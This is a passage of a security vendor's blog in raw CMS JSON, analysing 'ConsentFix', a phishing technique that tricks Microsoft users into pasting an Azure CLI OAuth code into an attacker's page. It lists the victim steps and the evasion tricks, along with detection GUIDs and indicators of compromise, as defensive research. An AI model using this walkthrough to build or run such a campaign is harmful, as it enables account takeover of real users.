You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":1258,"data":2220,"content":2221},{},[2222,2226,2235,2239,2248],{"nodeType":1257,"value":2223,"marks":2224,"data":2225},"To learn more about Push, ",[],{},{"nodeType":1364,"data":2227,"content":2229},{"uri":2228},"https://pushsecurity.com/resources/product-brochure",[2230],{"nodeType":1257,"value":2231,"marks":2232,"data":2234},"check out our latest product overview",[2233],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":2237,"data":2238}," or ",[],{},{"nodeType":1364,"data":2240,"content":2242},{"uri":2241},"https://pushsecurity.com/demo",[2243],{"nodeType":1257,"value":2244,"marks":2245,"data":2247},"book some time with one of our team for a live demo",[2246],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":2250,"data":2251},".",[],{},"\"Scattered Lapsus$ Hunters\" — how modern attackers exploit the gaps in your security stack ","How Scattered Lapsus$ Hunters breaches demonstrate the evolution of attacker TTPs, shaping the future of cyber attacks.","2025-11-13T00:00:00.000Z","scattered-lapsus-hunters",{"items":2257},[2258,2260],{"sys":2259,"name":1270},{"id":1269},{"sys":2261,"name":1274},{"id":1273},{"items":2263},[2264],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":2268},"Dan Green","Dan","Threat 
Research",{"url":2269},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1278,"sys":2271,"content":2273,"title":3125,"synopsis":3126,"hashTags":118,"publishedDate":3127,"slug":3128,"tagsCollection":3129,"authorsCollection":3135},{"id":2272},"71EaaK7lfl6bQBbkAU0qjv",{"json":2274},{"nodeType":1259,"data":2275,"content":2276},{},[2277,2285,2292,2299,2306,2318,2325,2331,2337,2340,2348,2355,2362,2368,2388,2395,2401,2408,2414,2421,2464,2470,2476,2483,2490,2493,2501,2521,2528,2534,2553,2559,2579,2586,2589,2597,2604,2649,2661,2664,2672,2691,2698,2714,2721,2728,2734,2741,2744,2752,2759,2812,2819,2822,2830,2836,2843,2850,2856,2863,2896,2903,2910,2916,2923,2929,2937,2957,2964,2997,3004,3037,3040,3048,3055,3061,3080,3087,3113,3119],{"nodeType":1311,"data":2278,"content":2279},{},[2280],{"nodeType":1257,"value":2281,"marks":2282,"data":2284},"Introducing “ConsentFix” — a new kind of phishing attack",[2283],{"type":1318},{},{"nodeType":1258,"data":2286,"content":2287},{},[2288],{"nodeType":1257,"value":2289,"marks":2290,"data":2291},"The Push browser agent recently detected and blocked a new attack technique seen targeting several Push customers. ",[],{},{"nodeType":1258,"data":2293,"content":2294},{},[2295],{"nodeType":1257,"value":2296,"marks":2297,"data":2298},"This is a new kind of browser-based attack technique that takes over user accounts with a simple copy and paste. If you’re already logged into the app in your browser, you don’t even need to supply creds, or pass an MFA check — meaning it effectively circumvents phishing-resistant auth like passkeys too.",[],{},{"nodeType":1258,"data":2300,"content":2301},{},[2302],{"nodeType":1257,"value":2303,"marks":2304,"data":2305},"This is so different from the AiTM phish kits we usually come up against that we felt it deserved a new name. 
",[],{},{"nodeType":1258,"data":2307,"content":2308},{},[2309,2314],{"nodeType":1257,"value":2310,"marks":2311,"data":2313},"Enter: ConsentFix. ",[2312],{"type":1318},{},{"nodeType":1257,"value":2315,"marks":2316,"data":2317},"This attack shares a lot of similarities with ClickFix/FileFix, AiTM phishing, and OAuth Consent Phishing. You can think of this as a browser-native ClickFix attack that phishes an OAuth token on a target app by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. ",[],{},{"nodeType":1258,"data":2319,"content":2320},{},[2321],{"nodeType":1257,"value":2322,"marks":2323,"data":2324},"The campaign we detected looks to be specifically targeting Microsoft accounts by abusing the Azure CLI OAuth app. Essentially, the attacker tricks the victim into logging into Azure CLI, by generating an OAuth authorization code — visible in a localhost URL — and then pasting that URL (including the code) into an attacker-controlled page. This then creates an OAuth connection between the victim’s Microsoft account and the attacker’s Azure CLI instance. ",[],{},{"nodeType":1335,"data":2326,"content":2330},{"target":2327},{"sys":2328},{"id":2329,"type":1340,"linkType":1341},"5GTnqWIbmraz8HZeHMybrP",[],{"nodeType":1335,"data":2332,"content":2336},{"target":2333},{"sys":2334},{"id":2335,"type":1340,"linkType":1341},"1lcjX5q3b1bsuhyOXKvJpW",[],{"nodeType":1307,"data":2338,"content":2339},{},[],{"nodeType":1311,"data":2341,"content":2342},{},[2343],{"nodeType":1257,"value":2344,"marks":2345,"data":2347},"How ConsentFix works",[2346],{"type":1318},{},{"nodeType":1258,"data":2349,"content":2350},{},[2351],{"nodeType":1257,"value":2352,"marks":2353,"data":2354},"In all of the examples we saw, the victim accessed a malicious or compromised webpage via Google Search. 
The vast majority of the sites we’ve seen associated with the campaign are legitimate, compromised websites with high domain reputation that are easily findable via search engines.",[],{},{"nodeType":1258,"data":2356,"content":2357},{},[2358],{"nodeType":1257,"value":2359,"marks":2360,"data":2361},"The attacker had injected a fake Cloudflare Turnstile into the compromised websites, requiring an email address to be supplied in order to proceed. ",[],{},{"nodeType":1335,"data":2363,"content":2367},{"target":2364},{"sys":2365},{"id":2366,"type":1340,"linkType":1341},"39jEjeLqOYIkGc4o9w3MuX",[],{"nodeType":1258,"data":2369,"content":2370},{},[2371,2375,2384],{"nodeType":1257,"value":2372,"marks":2373,"data":2374},"This acted as a form of ",[],{},{"nodeType":1364,"data":2376,"content":2378},{"uri":2377},"https://phishing-techniques.pushsecurity.com/techniques/conditional-loading/",[2379],{"nodeType":1257,"value":2380,"marks":2381,"data":2383},"conditional loading",[2382],{"type":1372},{},{"nodeType":1257,"value":2385,"marks":2386,"data":2387}," that would only continue if a valid email address and domain was supplied, designed to prevent the page from being analysed by security bots, analysts, and low-value accounts that run the risk of exposing the campaign before the intended recipient(s) can be phished. ",[],{},{"nodeType":1258,"data":2389,"content":2390},{},[2391],{"nodeType":1257,"value":2392,"marks":2393,"data":2394},"If a domain not on the target list was provided, the victim was passed back to the original website and the attack did not progress to the next stage. Further, once the check has concluded per IP, the phishing page will no longer activate, even if a different email is provided.  
",[],{},{"nodeType":1335,"data":2396,"content":2400},{"target":2397},{"sys":2398},{"id":2399,"type":1340,"linkType":1341},"7ttmGnTzi9j87tBXfyFcOA",[],{"nodeType":1258,"data":2402,"content":2403},{},[2404],{"nodeType":1257,"value":2405,"marks":2406,"data":2407},"After entering an approved email address, the next stage was loaded, prompting the victim to complete a set of instructions on the page to continue.",[],{},{"nodeType":1335,"data":2409,"content":2413},{"target":2410},{"sys":2411},{"id":2412,"type":1340,"linkType":1341},"2oHYNoMgAz6MdgLlcWjbaB",[],{"nodeType":1258,"data":2415,"content":2416},{},[2417],{"nodeType":1257,"value":2418,"marks":2419,"data":2420},"To complete the attack, the victim must:",[],{},{"nodeType":1884,"data":2422,"content":2423},{},[2424,2434,2444,2454],{"nodeType":1888,"data":2425,"content":2426},{},[2427],{"nodeType":1258,"data":2428,"content":2429},{},[2430],{"nodeType":1257,"value":2431,"marks":2432,"data":2433},"Click the “Sign In” button. This opens a new tab that loads a legitimate Microsoft URL associated with the user account/email used to access the page.",[],{},{"nodeType":1888,"data":2435,"content":2436},{},[2437],{"nodeType":1258,"data":2438,"content":2439},{},[2440],{"nodeType":1257,"value":2441,"marks":2442,"data":2443},"If the user is already logged into Microsoft in their browser, they simply need to select their MS account from the dropdown. Otherwise, they will be required to login via the legitimate Microsoft login URL (no phishing takes place at this stage). ",[],{},{"nodeType":1888,"data":2445,"content":2446},{},[2447],{"nodeType":1258,"data":2448,"content":2449},{},[2450],{"nodeType":1257,"value":2451,"marks":2452,"data":2453},"Once logged into legit Microsoft or the account is selected from the dropdown, the user is redirected to localhost, which generates a URL containing a code associated with the user’s Microsoft account. 
",[],{},{"nodeType":1888,"data":2455,"content":2456},{},[2457],{"nodeType":1258,"data":2458,"content":2459},{},[2460],{"nodeType":1257,"value":2461,"marks":2462,"data":2463},"To complete the phish, the victim copies the URL and pastes it onto the original page. ",[],{},{"nodeType":1335,"data":2465,"content":2469},{"target":2466},{"sys":2467},{"id":2468,"type":1340,"linkType":1341},"7zendMbmCViGwtEpUQvq6y",[],{"nodeType":1335,"data":2471,"content":2475},{"target":2472},{"sys":2473},{"id":2474,"type":1340,"linkType":1341},"1eZOs7hXi9FzCE92QEP6xh",[],{"nodeType":1258,"data":2477,"content":2478},{},[2479],{"nodeType":1257,"value":2480,"marks":2481,"data":2482},"Once the steps are completed, the victim has granted the attacker access to their Microsoft account via Azure CLI. ",[],{},{"nodeType":1258,"data":2484,"content":2485},{},[2486],{"nodeType":1257,"value":2487,"marks":2488,"data":2489},"At this point, the attacker has effective control of the victim’s Microsoft account, but without ever needing to phish a password, or pass an MFA check. In fact, if the user was already logged in to their Microsoft account (i.e. they had an active session) no login is required at all. ",[],{},{"nodeType":1307,"data":2491,"content":2492},{},[],{"nodeType":1311,"data":2494,"content":2495},{},[2496],{"nodeType":1257,"value":2497,"marks":2498,"data":2500},"The next evolution of ClickFix?",[2499],{"type":1318},{},{"nodeType":1258,"data":2502,"content":2503},{},[2504,2508,2517],{"nodeType":1257,"value":2505,"marks":2506,"data":2507},"When we presented ",[],{},{"nodeType":1364,"data":2509,"content":2511},{"uri":2510},"https://pushsecurity.com/webinar/clickfix",[2512],{"nodeType":1257,"value":2513,"marks":2514,"data":2516},"our last webinar on ClickFix",[2515],{"type":1372},{},{"nodeType":1257,"value":2518,"marks":2519,"data":2520},", we predicted that the next evolution of the attack would happen entirely within the browser context. 
This is because any attack that touches the endpoint (a traditionally much better protected surface) is way more likely to be detected. And with many ClickFix attacks being used to deliver infostealer malware, these attacks are really trying to get back into the browser anyway — to steal credentials and sessions stored there. ",[],{},{"nodeType":1258,"data":2522,"content":2523},{},[2524],{"nodeType":1257,"value":2525,"marks":2526,"data":2527},"Let’s take a closer look at the page — if you follow Push research, you might be getting déjà vu. ",[],{},{"nodeType":1335,"data":2529,"content":2533},{"target":2530},{"sys":2531},{"id":2532,"type":1340,"linkType":1341},"1vMZCJ92IxFdR1EzzCOOvb",[],{"nodeType":1258,"data":2535,"content":2536},{},[2537,2541,2550],{"nodeType":1257,"value":2538,"marks":2539,"data":2540},"We’ve seen this kind of embedded video player before (albeit a slicker looking one) that we blogged about as ",[],{},{"nodeType":1364,"data":2542,"content":2544},{"uri":2543},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/",[2545],{"nodeType":1257,"value":2546,"marks":2547,"data":2549},"the most advanced ClickFix we’d seen",[2548],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":2551,"data":2552},[],{},{"nodeType":1335,"data":2554,"content":2558},{"target":2555},{"sys":2556},{"id":2557,"type":1340,"linkType":1341},"ID7VKJNOZk729P5zBOBjZ",[],{"nodeType":1258,"data":2560,"content":2561},{},[2562,2566,2575],{"nodeType":1257,"value":2563,"marks":2564,"data":2565},"Another similarity with ClickFix campaigns we’ve investigated is the use of Google Search as a delivery vector. 
4 in 5 ClickFix attacks intercepted by Push came via Google Search, with attackers using ",[],{},{"nodeType":1364,"data":2567,"content":2569},{"uri":2568},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[2570],{"nodeType":1257,"value":2571,"marks":2572,"data":2574},"malvertising",[2573],{"type":1372},{},{"nodeType":1257,"value":2576,"marks":2577,"data":2578}," and either compromised or custom vibe-coded websites to intercept users as they browse the internet. ",[],{},{"nodeType":1258,"data":2580,"content":2581},{},[2582],{"nodeType":1257,"value":2583,"marks":2584,"data":2585},"So it seems highly likely that this is a kind of browser-native evolution of ClickFix that shares many elements with typical ClickFix attacks, and is probably used by the same groups of attackers.",[],{},{"nodeType":1307,"data":2587,"content":2588},{},[],{"nodeType":1311,"data":2590,"content":2591},{},[2592],{"nodeType":1257,"value":2593,"marks":2594,"data":2596},"OAuth shenanigans via Azure CLI",[2595],{"type":1318},{},{"nodeType":1258,"data":2598,"content":2599},{},[2600],{"nodeType":1257,"value":2601,"marks":2602,"data":2603},"The clever use of Azure CLI and OAuth consent abuse is another clever iteration on previous techniques. 
",[],{},{"nodeType":1258,"data":2605,"content":2606},{},[2607,2611,2620,2623,2632,2636,2645],{"nodeType":1257,"value":2608,"marks":2609,"data":2610},"We’ve previously seen ",[],{},{"nodeType":1364,"data":2612,"content":2614},{"uri":2613},"https://phishing-techniques.pushsecurity.com/techniques/consent-phishing/",[2615],{"nodeType":1257,"value":2616,"marks":2617,"data":2619},"consent phishing",[2618],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":2621,"data":2622},[],{},{"nodeType":1364,"data":2624,"content":2626},{"uri":2625},"https://phishing-techniques.pushsecurity.com/techniques/device-code-phishing/",[2627],{"nodeType":1257,"value":2628,"marks":2629,"data":2631},"device code phishing",[2630],{"type":1372},{},{"nodeType":1257,"value":2633,"marks":2634,"data":2635}," attacks where attackers have tricked victims into connecting malicious external apps into their tenant via OAuth, but this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":1364,"data":2637,"content":2639},{"uri":2638},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[2640],{"nodeType":1257,"value":2641,"marks":2642,"data":2644},"stricter default configs",[2643],{"type":1372},{},{"nodeType":1257,"value":2646,"marks":2647,"data":2648},". However, since Azure CLI is a first-party Microsoft app, it is implicitly trusted in Entra ID, and is excluded from these restrictions. ",[],{},{"nodeType":1258,"data":2650,"content":2651},{},[2652,2656],{"nodeType":1257,"value":2653,"marks":2654,"data":2655},"First-party apps like Azure CLI are trusted by default in all tenants, allowed to request permissions without admin approval, and cannot be deleted or blocked. 
They can also be granted special permissions, such as tenant-wide service permissions (without needing admin approval), use of legacy or undocumented graph scopes, internal scopes for Microsoft client operations, and permissions for Office/Entra admin functions. ",[],{},{"nodeType":1257,"value":2657,"marks":2658,"data":2660},"This makes Azure CLI a prime target for attackers, and significantly more exploitable than when connecting a third-party app. ",[2659],{"type":1318},{},{"nodeType":1307,"data":2662,"content":2663},{},[],{"nodeType":1311,"data":2665,"content":2666},{},[2667],{"nodeType":1257,"value":2668,"marks":2669,"data":2671},"Advanced detection evasion techniques",[2670],{"type":1318},{},{"nodeType":1258,"data":2673,"content":2674},{},[2675,2679,2687],{"nodeType":1257,"value":2676,"marks":2677,"data":2678},"This campaign features some of the most advanced ",[],{},{"nodeType":1364,"data":2680,"content":2682},{"uri":2681},"https://phishing-techniques.pushsecurity.com/",[2683],{"nodeType":1257,"value":2684,"marks":2685,"data":2686},"detection evasion techniques",[],{},{"nodeType":1257,"value":2688,"marks":2689,"data":2690}," we've seen in the wild. ",[],{},{"nodeType":1258,"data":2692,"content":2693},{},[2694],{"nodeType":1257,"value":2695,"marks":2696,"data":2697},"As well as the use of Google Search to deliver the lure, and bot protection to prevent security tools from analysing the page, there were multiple layers of anti-analysis techniques to navigate.",[],{},{"nodeType":1258,"data":2699,"content":2700},{},[2701,2705,2710],{"nodeType":1257,"value":2702,"marks":2703,"data":2704},"We already mentioned the use of selective targeting based on email addresses and domain names. 
But all sites involved in the campaign also have synchronized IP blocking — meaning if you visit one site and are served one of the associated phishing pages, the phish will never be served again, ",[],{},{"nodeType":1257,"value":2706,"marks":2707,"data":2709},"across any of the sites linked to the campaign",[2708],{"type":1318},{},{"nodeType":1257,"value":2711,"marks":2712,"data":2713},". When you visit any of the sites again, the phish won't trigger, and it can be browsed as normal. ",[],{},{"nodeType":1258,"data":2715,"content":2716},{},[2717],{"nodeType":1257,"value":2718,"marks":2719,"data":2720},"On the backend, there are multiple checks based on your IP and identifiers unique to your session. Unless all of the conditions are met, certain JavaScript packages won't be served — preventing full inspection of the page to detect malicious elements. ",[],{},{"nodeType":1258,"data":2722,"content":2723},{},[2724],{"nodeType":1257,"value":2725,"marks":2726,"data":2727},"If the conditions aren't met, the page may not load the Cloudflare Turnstile check at all, or will redirect you back to the site to continue browsing as normal.",[],{},{"nodeType":1335,"data":2729,"content":2733},{"target":2730},{"sys":2731},{"id":2732,"type":1340,"linkType":1341},"5v0zDoscA6pYLBfkXrNtIH",[],{"nodeType":1258,"data":2735,"content":2736},{},[2737],{"nodeType":1257,"value":2738,"marks":2739,"data":2740},"All of these make it incredibly hard to detect and block these attacks ahead of time when relying on URL-based checks and traffic analysis.",[],{},{"nodeType":1307,"data":2742,"content":2743},{},[],{"nodeType":1311,"data":2745,"content":2746},{},[2747],{"nodeType":1257,"value":2748,"marks":2749,"data":2751},"Key takeaways",[2750],{"type":1318},{},{"nodeType":1258,"data":2753,"content":2754},{},[2755],{"nodeType":1257,"value":2756,"marks":2757,"data":2758},"ConsentFix is a dangerous evolution of ClickFix and consent phishing that is incredibly hard for traditional security tools to detect 
and block, as:",[],{},{"nodeType":1884,"data":2760,"content":2761},{},[2762,2772,2782,2792,2802],{"nodeType":1888,"data":2763,"content":2764},{},[2765],{"nodeType":1258,"data":2766,"content":2767},{},[2768],{"nodeType":1257,"value":2769,"marks":2770,"data":2771},"The attack happens entirely inside the browser context, removing one of the key detection opportunities for ClickFix (because it doesn’t touch the endpoint).",[],{},{"nodeType":1888,"data":2773,"content":2774},{},[2775],{"nodeType":1258,"data":2776,"content":2777},{},[2778],{"nodeType":1257,"value":2779,"marks":2780,"data":2781},"Delivering the lure via a Google Search watering hole attack completely circumvents email-based anti-phishing controls.",[],{},{"nodeType":1888,"data":2783,"content":2784},{},[2785],{"nodeType":1258,"data":2786,"content":2787},{},[2788],{"nodeType":1257,"value":2789,"marks":2790,"data":2791},"Targeting a first-party app like Azure CLI means that many of the mitigating controls available for third-party app integrations do not apply — making this attack way harder to prevent.",[],{},{"nodeType":1888,"data":2793,"content":2794},{},[2795],{"nodeType":1258,"data":2796,"content":2797},{},[2798],{"nodeType":1257,"value":2799,"marks":2800,"data":2801},"Because there’s no login required, phishing-resistant authentication controls like passkeys have no impact on this attack. ",[],{},{"nodeType":1888,"data":2803,"content":2804},{},[2805],{"nodeType":1258,"data":2806,"content":2807},{},[2808],{"nodeType":1257,"value":2809,"marks":2810,"data":2811},"The use of advanced detection evasion techniques makes this attack difficult to investigate, meaning these attacks are going undetected. ",[],{},{"nodeType":1258,"data":2813,"content":2814},{},[2815],{"nodeType":1257,"value":2816,"marks":2817,"data":2818},"We’re sure to see more examples of ConsentFix in future. 
We’ll be monitoring to see how attackers adapt in terms of integrating these capabilities with common as-a-Service offerings to make them more widespread, and whether the scope extends further beyond Microsoft / Azure CLI targets in the future to target other enterprise cloud ecosystems. ",[],{},{"nodeType":1307,"data":2820,"content":2821},{},[],{"nodeType":1311,"data":2823,"content":2824},{},[2825],{"nodeType":1257,"value":2826,"marks":2827,"data":2829},"Recommendations",[2828],{"type":1318},{},{"nodeType":1335,"data":2831,"content":2835},{"target":2832},{"sys":2833},{"id":2834,"type":1340,"linkType":1341},"3aBCwdB2aNnLRxRN5RrshC",[],{"nodeType":1258,"data":2837,"content":2838},{},[2839],{"nodeType":1257,"value":2840,"marks":2841,"data":2842},"On the backend, a successful attack will produce login events for the Microsoft Azure CLI app. Legitimate use of this app is most likely limited to system administrators and possibly developers. Therefore, logins outside of these groups will be inherently more suspicious.",[],{},{"nodeType":1258,"data":2844,"content":2845},{},[2846],{"nodeType":1257,"value":2847,"marks":2848,"data":2849},"Additionally, it’s possible that aspects of the logins themselves will be different between legitimate Azure CLI use and exploitation of this attack. For example, see the following logs from a lab environment. The login events with an application of “Microsoft Azure CLI” and a resource of “Azure Resource Manager” were legitimate use of the Azure CLI using the PowerShell CLI framework. 
Conversely, the login event with the Resource of “Windows Azure Active Directory” was produced by logging in using the method used by the phishing kit.",[],{},{"nodeType":1335,"data":2851,"content":2855},{"target":2852},{"sys":2853},{"id":2854,"type":1340,"linkType":1341},"6ie0nkk6XbgwidfwmiGwL4",[],{"nodeType":1258,"data":2857,"content":2858},{},[2859],{"nodeType":1257,"value":2860,"marks":2861,"data":2862},"There is no guarantee this can be used to differentiate between legitimate and malicious examples, but it’s another data point to consider. If searching logs, you may wish to use the respective GUIDs for the “Microsoft Azure CLI” application and the “Windows Azure Active Directory” resource:",[],{},{"nodeType":1884,"data":2864,"content":2865},{},[2866,2881],{"nodeType":1888,"data":2867,"content":2868},{},[2869],{"nodeType":1258,"data":2870,"content":2871},{},[2872,2877],{"nodeType":1257,"value":2873,"marks":2874,"data":2876},"Application ID",[2875],{"type":1318},{},{"nodeType":1257,"value":2878,"marks":2879,"data":2880}," = 04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":1888,"data":2882,"content":2883},{},[2884],{"nodeType":1258,"data":2885,"content":2886},{},[2887,2892],{"nodeType":1257,"value":2888,"marks":2889,"data":2891},"Resource ID",[2890],{"type":1318},{},{"nodeType":1257,"value":2893,"marks":2894,"data":2895}," = 00000002-0000-0000-c000-000000000000",[],{},{"nodeType":1258,"data":2897,"content":2898},{},[2899],{"nodeType":1257,"value":2900,"marks":2901,"data":2902},"For interactive logins, like above, you cannot rely on looking for logins from suspicious IP addresses or locations. The login itself occurs from the victim’s browser directly to Microsoft, and so the IP addresses associated with these events will be the legitimate IP used by the target user, not by the threat actor. 
",[],{},{"nodeType":1258,"data":2904,"content":2905},{},[2906],{"nodeType":1257,"value":2907,"marks":2908,"data":2909},"However, for non-interactive logins and other audit logs for actions taken, you may be able to uncover unusual IP addresses that differ from the original interactive login. For example, here are some non-interactive logins that were observed immediately after compromise that came from different IP addresses in both the US and Indonesia.",[],{},{"nodeType":1335,"data":2911,"content":2915},{"target":2912},{"sys":2913},{"id":2914,"type":1340,"linkType":1341},"TD3YeWqgGIWIWM8FRHU4o",[],{"nodeType":1258,"data":2917,"content":2918},{},[2919],{"nodeType":1257,"value":2920,"marks":2921,"data":2922},"Interestingly, they differ in which resources they accessed, with one accessing the Windows Azure Active Directory resource ID like the interactive login, but two others accessing the Microsoft Intune Checkin resource ID. ",[],{},{"nodeType":1335,"data":2924,"content":2928},{"target":2925},{"sys":2926},{"id":2927,"type":1340,"linkType":1341},"57PqDQiAiwzqkspVpROQXb",[],{"nodeType":1468,"data":2930,"content":2931},{},[2932],{"nodeType":1257,"value":2933,"marks":2934,"data":2936},"IoCs",[2935],{"type":1318},{},{"nodeType":1258,"data":2938,"content":2939},{},[2940,2944,2953],{"nodeType":1257,"value":2941,"marks":2942,"data":2943},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1364,"data":2945,"content":2947},{"uri":2946},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[2948],{"nodeType":1257,"value":2949,"marks":2950,"data":2952},"quickly spin up and rotate the sites used",[2951],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":2955,"data":2956}," in the attack chain, often dynamically serving different URLs to site visitors. 
",[],{},{"nodeType":1258,"data":2958,"content":2959},{},[2960],{"nodeType":1257,"value":2961,"marks":2962,"data":2963},"That said, the domains used to deliver the final phishing payload were:",[],{},{"nodeType":1884,"data":2965,"content":2966},{},[2967,2977,2987],{"nodeType":1888,"data":2968,"content":2969},{},[2970],{"nodeType":1258,"data":2971,"content":2972},{},[2973],{"nodeType":1257,"value":2974,"marks":2975,"data":2976},"hxxps://trustpointassurance.com/",[],{},{"nodeType":1888,"data":2978,"content":2979},{},[2980],{"nodeType":1258,"data":2981,"content":2982},{},[2983],{"nodeType":1257,"value":2984,"marks":2985,"data":2986},"hxxps://fastwaycheck.com/",[],{},{"nodeType":1888,"data":2988,"content":2989},{},[2990],{"nodeType":1258,"data":2991,"content":2992},{},[2993],{"nodeType":1257,"value":2994,"marks":2995,"data":2996},"hxxps://previewcentral.com",[],{},{"nodeType":1258,"data":2998,"content":2999},{},[3000],{"nodeType":1257,"value":3001,"marks":3002,"data":3003},"In addition, we recommend hunting for connections from the following IPs in Azure logs:",[],{},{"nodeType":1884,"data":3005,"content":3006},{},[3007,3017,3027],{"nodeType":1888,"data":3008,"content":3009},{},[3010],{"nodeType":1258,"data":3011,"content":3012},{},[3013],{"nodeType":1257,"value":3014,"marks":3015,"data":3016},"12.75.216.90",[],{},{"nodeType":1888,"data":3018,"content":3019},{},[3020],{"nodeType":1258,"data":3021,"content":3022},{},[3023],{"nodeType":1257,"value":3024,"marks":3025,"data":3026},"182.3.36.223",[],{},{"nodeType":1888,"data":3028,"content":3029},{},[3030],{"nodeType":1258,"data":3031,"content":3032},{},[3033],{"nodeType":1257,"value":3034,"marks":3035,"data":3036},"12.75.116.137",[],{},{"nodeType":1307,"data":3038,"content":3039},{},[],{"nodeType":1311,"data":3041,"content":3042},{},[3043],{"nodeType":1257,"value":3044,"marks":3045,"data":3047},"How Push stopped the 
attack",[3046],{"type":1318},{},{"nodeType":1258,"data":3049,"content":3050},{},[3051],{"nodeType":1257,"value":3052,"marks":3053,"data":3054},"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",[],{},{"nodeType":1335,"data":3056,"content":3060},{"target":3057},{"sys":3058},{"id":3059,"type":1340,"linkType":1341},"5YzpiQH974EYA5iPPZMXkV",[],{"nodeType":1258,"data":3062,"content":3063},{},[3064,3068,3076],{"nodeType":1257,"value":3065,"marks":3066,"data":3067},"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that Push sees what your users see. It doesn’t matter what ",[],{},{"nodeType":1364,"data":3069,"content":3070},{"uri":2681},[3071],{"nodeType":1257,"value":3072,"marks":3073,"data":3075},"delivery channel or camouflage methods are used",[3074],{"type":1372},{},{"nodeType":1257,"value":3077,"marks":3078,"data":3079},", Push shuts the attack down in real time, as the user loads the malicious page in their web browser.",[],{},{"nodeType":1258,"data":3081,"content":3082},{},[3083],{"nodeType":1257,"value":3084,"marks":3085,"data":3086},"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. 
You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1258,"data":3088,"content":3089},{},[3090,3093,3100,3103,3110],{"nodeType":1257,"value":2223,"marks":3091,"data":3092},[],{},{"nodeType":1364,"data":3094,"content":3095},{"uri":2228},[3096],{"nodeType":1257,"value":2231,"marks":3097,"data":3099},[3098],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":3101,"data":3102},[],{},{"nodeType":1364,"data":3104,"content":3105},{"uri":2241},[3106],{"nodeType":1257,"value":2244,"marks":3107,"data":3109},[3108],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":3111,"data":3112},[],{},{"nodeType":1335,"data":3114,"content":3118},{"target":3115},{"sys":3116},{"id":3117,"type":1340,"linkType":1341},"6QzB0BlVC5mstXwXHvy2c3",[],{"nodeType":1258,"data":3120,"content":3121},{},[3122],{"nodeType":1257,"value":31,"marks":3123,"data":3124},[],{},"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants","Analysing \"ConsentFix\", a new browser-native attack technique we've detected in the wild, combining OAuth consent phishing with a ClickFix-style user prompt. 
","2025-12-11T00:00:00.000Z","consentfix",{"items":3130},[3131,3133],{"sys":3132,"name":1270},{"id":1269},{"sys":3134,"name":1274},{"id":1273},{"items":3136},[3137],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":3141},"Luke Jennings","Luke","Vice President, R&D",{"url":3142},"https://images.ctfassets.net/y1cdw1ablpvd/4Hosb4zKi1dA0PUyDLMe1h/27e09d894861f2196ba794037986fb08/T016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":1278,"sys":3144,"content":3146,"title":3763,"synopsis":3764,"hashTags":118,"publishedDate":3765,"slug":3766,"tagsCollection":3767,"authorsCollection":3773},{"id":3145},"44DXq5ZkL9XQV5Fngto0XZ",{"json":3147},{"nodeType":1259,"data":3148,"content":3149},{},[3150,3169,3176,3183,3186,3194,3214,3233,3267,3273,3276,3284,3292,3299,3317,3324,3329,3335,3342,3349,3357,3364,3371,3377,3384,3404,3412,3419,3426,3446,3452,3472,3478,3485,3491,3494,3502,3509,3528,3535,3564,3571,3579,3582,3590,3597,3604,3610,3617,3662,3668,3675,3707,3713,3757],{"nodeType":1258,"data":3151,"content":3152},{},[3153,3156,3165],{"nodeType":1257,"value":31,"marks":3154,"data":3155},[],{},{"nodeType":1364,"data":3157,"content":3159},{"uri":3158},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[3160],{"nodeType":1257,"value":3161,"marks":3162,"data":3164},"Scattered Lapsus$ Hunters",[3163],{"type":1372},{},{"nodeType":1257,"value":3166,"marks":3167,"data":3168}," are running a large-scale hybrid vishing plus AiTM phishing campaign across several industry verticals, targeting Okta, Entra, and Google SSO platforms. ",[],{},{"nodeType":1258,"data":3170,"content":3171},{},[3172],{"nodeType":1257,"value":3173,"marks":3174,"data":3175},"The attacks begin with the attacker calling their victim, impersonating IT staff from their company. 
